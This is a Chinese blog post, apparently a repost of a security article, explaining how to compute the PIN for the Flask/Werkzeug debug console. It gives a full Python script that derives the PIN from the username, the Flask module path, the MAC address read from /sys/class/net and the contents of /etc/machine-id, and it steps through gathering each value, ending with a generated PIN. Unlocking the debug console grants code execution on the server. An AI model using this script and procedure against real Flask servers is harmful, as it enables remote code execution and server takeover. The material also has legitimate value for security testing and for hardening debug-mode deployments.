Flask debug模式下的 PIN 码安全性

作者: print("") 分类: 未分类 发布时间: 2020-08-12 17:45

原文地址:https://xz.aliyun.com/t/8092

环境:

Centos8 

python3.6

FlasK 1.1.2

首先确认一下Flask 版本 

#python
Python 3.6.8 (default, Nov 21 2019, 19:31:34) 
[GCC 8.3.1 20190507 (Red Hat 8.3.1-4)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import flask
>>> flask.__version__
'1.1.2'
>>> flask.__version__
'1.1.2'

首先是最开是pyload  

import hashlib
from itertools import chain
probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
    '52228526895',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '75d03aa852be476cbe73544c93e98276'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

首先需要找到 

probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

前面三个的值不需要改。就只需要改最后一个值

先让Flask 报错

最后一个值为

/usr/local/lib/python3.6/site-packages/flask/app.py

得到 

probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.6/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

然后就剩下了

private_bits 两个值了 

private_bits = [
    '52228526895',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '75d03aa852be476cbe73544c93e98276'# get_machine_id(), /etc/machine-id
]

首先第一个

str(uuid.getnode()) MAC地址 

读取这两个地址:/sys/class/net/eth0/address 或者 /sys/class/net/ens33/address

或者直接是写一个路由 

@app.route('/tips',methods=method_get)
def tips():
    return str(uuid.getnode())

得到MAC的地址的十进制数

第二个值直接读取

#cat /etc/machine-id
1cc3a23e80024d81aebf4e9f2b94a569

拼接成如下

probably_public_bits = [
    'root'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.6/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '52232902079',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '1cc3a23e80024d81aebf4e9f2b94a569'# get_machine_id(), /etc/machine-id
]

然后执行

#python ac.py 
320-808-369

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

您的电子邮箱地址不会被公开。

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA